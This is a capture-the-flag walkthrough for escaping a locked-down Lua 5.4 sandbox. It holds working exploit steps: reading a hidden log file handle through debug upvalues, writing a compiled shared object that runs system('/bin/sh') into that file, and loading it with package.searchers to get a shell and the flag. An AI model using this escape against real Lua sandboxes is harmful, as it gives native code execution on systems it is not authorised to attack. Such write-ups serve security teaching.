# moonshot walkthrough

The goal of this challenge is to escape a somewhat locked down Lua sandbox to
gain native code execution so you can read flag.txt. All the usual known bad
Lua functions (like `os.execute`) have been removed, but just enough have been
left in to allow native code execution to happen.

## Hints

1. First hint
<details>
<summary>Spoiler warning</summary>
You're in a Lua sandbox - what's different between the server's environment
and a vanilla Lua environment?
</details>

2. Second hint
<details>
<summary>Spoiler warning</summary>
Are there any useful upvalues that you can find?
</details>

3. Third hint
<details>
<summary>Spoiler warning</summary>
Have you looked at the Lua reference manual entry for every function you have
access to?
</details>

## Steps

The challenge presents you with just an interactive Lua prompt for the latest
version of Lua (at the time of writing) and no other information.

First we can look at everything in the global table (called `_G`). You can use
some code from http://lua-users.org/wiki/TableSerialization to print a table
recursively. I ended up using this code:

```
function table_print (tt, indent, done)
  done = done or {}
  done[tt] = true
  done[package.loaded] = true
  indent = indent or 0
  if type(tt) == "table" then
    local sb = {}
    for key, value in pairs (tt) do
      table.insert(sb, string.rep (" ", indent)) -- indent it
      if type (value) == "table" and not done [value] then
        done [value] = true
        table.insert(sb, key .. " = {\n");
        table.insert(sb, table_print (value, indent + 2, done))
        table.insert(sb, string.rep (" ", indent)) -- indent it
        table.insert(sb, "}\n");
      elseif "number" == type(key) then
        table.insert(sb, string.format("\"%s\"\n", tostring(value)))
      else
        table.insert(sb, string.format(
            "%s = \"%s\"\n", tostring (key), tostring(value)))
       end
    end
    return table.concat(sb)
  else
    return tt .. "\n"
  end
end

function to_string( tbl )
    if  "nil"       == type( tbl ) then
        return tostring(nil)
    elseif  "table" == type( tbl ) then
        return table_print(tbl)
    elseif  "string" == type( tbl ) then
        return tbl
    else
        return tostring(tbl)
    end
end
```

Applying this to `_G` by running `to_string(_G)` gives:

```
pcall = "function: 0x423120"
select = "function: 0x4222e0"
print = "function: 0x422820"
type = "function: 0x422250"
_G = "table: 0x1318c10"
to_string = "function: 0x1326ce0"
ipairs = "function: 0x4228f0"
getmetatable = "function: 0x422fe0"
tostring = "function: 0x4222b0"
assert = "function: 0x4230b0"
error = "function: 0x422aa0"
rawlen = "function: 0x4226f0"
package = {
  cpath = "/usr/local/lib/lua/5.4/?.so;/usr/local/lib/lua/5.4/loadall.so;./?.so"
  config = "/
;
?
!
-
"
  searchers = {
    "function: 0x131b900"
    "function: 0x131b940"
    "function: 0x131b980"
    "function: 0x131b9c0"
  }
  searchpath = "function: 0x427710"
  loaded = "table: 0x131aa30"
  path = "/usr/local/share/lua/5.4/?.lua;/usr/local/share/lua/5.4/?/init.lua;/usr/local/lib/lua/5.4/?.lua;/usr/local/lib/lua/5.4/?/init.lua;./?.lua;./?/init.lua"
  preload = {
  }
}
table_print = "function: 0x131d1e0"
log = "function: 0x131d0b0"
arg = {
  "/noob/sandbox.lua"
  "/noob/lua"
  "-i"
}
rawget = "function: 0x4226a0"
debug = {
  traceback = "function: 0x423e30"
  getregistry = "function: 0x423890"
  gethook = "function: 0x424520"
  setmetatable = "function: 0x423960"
  getinfo = "function: 0x424090"
  getupvalue = "function: 0x423950"
  getmetatable = "function: 0x423b80"
  getlocal = "function: 0x4246c0"
  sethook = "function: 0x424860"
}
utf8 = {
  char = "function: 0x42dc50"
  len = "function: 0x42d840"
  codepoint = "function: 0x42da40"
  charpattern = "[-.-.][.-.]*"
  offset = "function: 0x42d630"
  codes = "function: 0x42d4b0"
}
pairs = "function: 0x422d80"
warn = "function: 0x422780"
coroutine = {
  yield = "function: 0x4232d0"
  isyieldable = "function: 0x4234f0"
  running = "function: 0x423480"
  create = "function: 0x4234a0"
  close = "function: 0x423700"
  wrap = "function: 0x4237c0"
  resume = "function: 0x423650"
  status = "function: 0x4235e0"
}
next = "function: 0x422930"
rawequal = "function: 0x422740"
_VERSION = "Lua 5.4"
math = {
  modf = "function: 0x4269c0"
  min = "function: 0x426530"
  sin = "function: 0x426500"
  floor = "function: 0x426d70"
  sinh = "function: 0x426430"
  max = "function: 0x4265c0"
  atan = "function: 0x4268a0"
  deg = "function: 0x4262c0"
  acos = "function: 0x426930"
  ceil = "function: 0x426e40"
  abs = "function: 0x426bc0"
  exp = "function: 0x426840"
  cosh = "function: 0x426460"
  huge = "inf"
  log10 = "function: 0x4262f0"
  tanh = "function: 0x426400"
  atan2 = "function: 0x4268a0"
  ldexp = "function: 0x426320"
  mininteger = "-9223372036854775808"
  maxinteger = "9223372036854775807"
  log = "function: 0x426650"
  fmod = "function: 0x426760"
  cos = "function: 0x426870"
  asin = "function: 0x426900"
  pi = "3.1415926535898"
  randomseed = "function: 0x131ec90"
  sqrt = "function: 0x4264c0"
  frexp = "function: 0x426370"
  pow = "function: 0x4263b0"
  ult = "function: 0x426720"
  type = "function: 0x426960"
  tan = "function: 0x426490"
  random = "function: 0x131ec50"
  tointeger = "function: 0x426b60"
  rad = "function: 0x426290"
}
rawset = "function: 0x422650"
setmetatable = "function: 0x4225b0"
tonumber = "function: 0x422380"
string = {
  match = "function: 0x42c570"
  len = "function: 0x428c30"
  upper = "function: 0x428f50"
  packsize = "function: 0x42a4a0"
  dump = "function: 0x4295b0"
  unpack = "function: 0x42abd0"
  find = "function: 0x42c580"
  gsub = "function: 0x42b8c0"
  reverse = "function: 0x428fe0"
  format = "function: 0x4297f0"
  char = "function: 0x4294b0"
  lower = "function: 0x4291b0"
  rep = "function: 0x429060"
  sub = "function: 0x42af30"
  byte = "function: 0x42b130"
  pack = "function: 0x42a590"
  gmatch = "function: 0x42b020"
}
table = {
  remove = "function: 0x42ced0"
  sort = "function: 0x42ce20"
  move = "function: 0x42d1f0"
  concat = "function: 0x42cfe0"
  insert = "function: 0x42d0f0"
  pack = "function: 0x42c750"
  unpack = "function: 0x42c650"
}
xpcall = "function: 0x4231a0"
```

If we run the same code on a vanilla Lua 5.4.2 interpreter, we can see that
`io`, `os`, some stuff in `debug`, some stuff in `package`, and some global
functions are missing. Basically all the common known bad functions are gone,
e.g. you can’t run `os.execute` or `io.open`.

We can also see that there's another function called "log" in the global
table, which is not part of vanilla Lua. To get a bit of an idea of what this
function might be doing, we can run `string.dump` on it which will give us the
Lua bytecode representation of it.

```
> string.dump(log)
uaT..
.
xV(w@..@/noob/sandbox.lua..................................write..flush..............data....debug_log_print.LOG_FILE
```

From a cursory scan, we can see references `write`, `flush`, and `LOG_FILE`,
so it might be writing to some kind of log file if we call it.

To get some more info, we can also print result of `debug.getinfo`.

```
> to_string(debug.getinfo(log))
short_src = "/noob/sandbox.lua"
nparams = "1"
istailcall = "false"
ftransfer = "0"
what = "Lua"
currentline = "-1"
func = "function: 0x1048050"
ntransfer = "0"
linedefined = "21"
source = "@/noob/sandbox.lua"
namewhat = ""
lastlinedefined = "25"
isvararg = "false"
nups = "2"
```

So now we know that the function takes 1 parameter (`nparams`), and has 2
upvalues (`nups`) which are essentially references to local variables defined
outside the scope of the function. To find out what these upvalues are, we
can print them:

```
> for i = 1,2 do print(to_string({debug.getupvalue(log, i)})) end
"debug_log_print"
"function: 0x1047fb0"

"LOG_FILE"
"file (0x104aad0)"
```

We can see that `LOG_FILE` is a file object (one that would have been opened
via `io.open`) and `debug_log_print` is a function.

Let's repeat the same process on `debug_log_print`:

```
> debug_log_print = select(2, debug.getupvalue(log, 1))
> string.dump(debug_log_print)
uaT..
.
xV(w@..@/noob/sandbox.lua........................5..........print..Writing '..' to logfile '..'.............data....DEBUG_PRINT._ENV.LOG_FILE_NAME
> to_string(debug.getinfo(debug_log_print))
short_src = "/noob/sandbox.lua"
nparams = "1"
istailcall = "false"
ftransfer = "0"
what = "Lua"
currentline = "-1"
func = "function: 0x1047fb0"
ntransfer = "0"
linedefined = "15"
source = "@/noob/sandbox.lua"
namewhat = ""
lastlinedefined = "19"
isvararg = "false"
nups = "3"
> for i = 1,3 do print(to_string({debug.getupvalue(debug_log_print, i)})) end
"DEBUG_PRINT"
"false"

"_ENV"
2 = {
  ...
}

"LOG_FILE_NAME"
"/logs/GlhEjOKGkLbCBiut.log"
```

Now we know that the file that `LOG_FILE` is writing to is probably
`/logs/GlhEjOKGkLbCBiut.log`. To confirm that we have control of this file, we
can write something to it, then read it back:

```
> file = select(2, debug.getupvalue(log, 2))
> file
file (0x1c28ad0)
> file:write("hello")
file (0x1c28ad0)
> file:seek("set", 0)
0
> file:read(5)
hello
```

Great! We can write to a file. So what? If we look through all the entries in
the global table, we'll see that `package.searchers` has not been removed. If
we look at the documentation for this table
(https://www.lua.org/manual/5.4/manual.html#pdf-package.searchers), it says
this:

> The third searcher looks for a loader as a C library, using the path given
> by the variable package.cpath...
>
> Once it finds a C library, this searcher first uses a dynamic link facility
> to link the application with the library. Then it tries to find a C function
> inside the library to be used as the loader.
>
> The name of this C function is the string "luaopen_" concatenated with a
> copy of the module name...

Essentially what this means is that we can load a `.so` file and get native
code execution if we can make `package.cpath` point to a `.so` file.
Fortunately, we have the ability to write arbitrary data to a file that we
know the path of!

First we need to compile a `.so` file that meets the requirements of
`package.searchers[3]` - it needs to export `luaopen_<something>`. Here's the
code we'll compile:

```
#include <stdlib.h>

int luaopen_escape(void* L) {
    system("/bin/sh");
    return 1;
}
```

And we'll compile it with:

```
gcc escape.c -fPIC -shared -o libescape.so
```

Now we need to write this file using the `log` function. For some reason the
interpreter doesn't seem to accept long lines, so here's some Python that uses
pwntools to build up the data on the server in chunks:

```
p.sendline(b'data = ""')
with open(libescape_path, 'rb') as f:
    while True:
        data = f.read(64)
        if not data:
            break
        data_string = 'data = data .. "'
        for b in data:
            data_string += f'\\x{b:02x}'
        data_string += '"'
        p.sendline(data_string)
```

Next we write the data to the log file:

```
> log(data)
```

Then grab the log file name:

```
> log_file_name = select(2, debug.getupvalue(debug_log_print, 3))
```

Then set `package.cpath` to point to the log file:

```
> package.cpath = log_file_name
```

Now we can load the log file as a shared object and execute the
`luaopen_escape` function to give us a shell where we can read the flag:

```
> package.searchers[3]("escape")()
ls -lah
total 300K
drwxr-xr-x  1 1338 1338 4.0K Mar  8 12:23 .
drwxrwxrwt 10 1338 1338  200 Mar  8 12:53 ..
-r--r--r--  1 1338 1338   30 Mar  6 10:36 flag.txt
-r-xr-xr-x  1 1338 1338 288K Mar  6 10:36 lua
-r--r--r--  1 1338 1338 1.2K Mar  8 12:23 sandbox.lua
cat flag.txt
cybears{y0_wh4t5_upv4lu3_d0g}
```
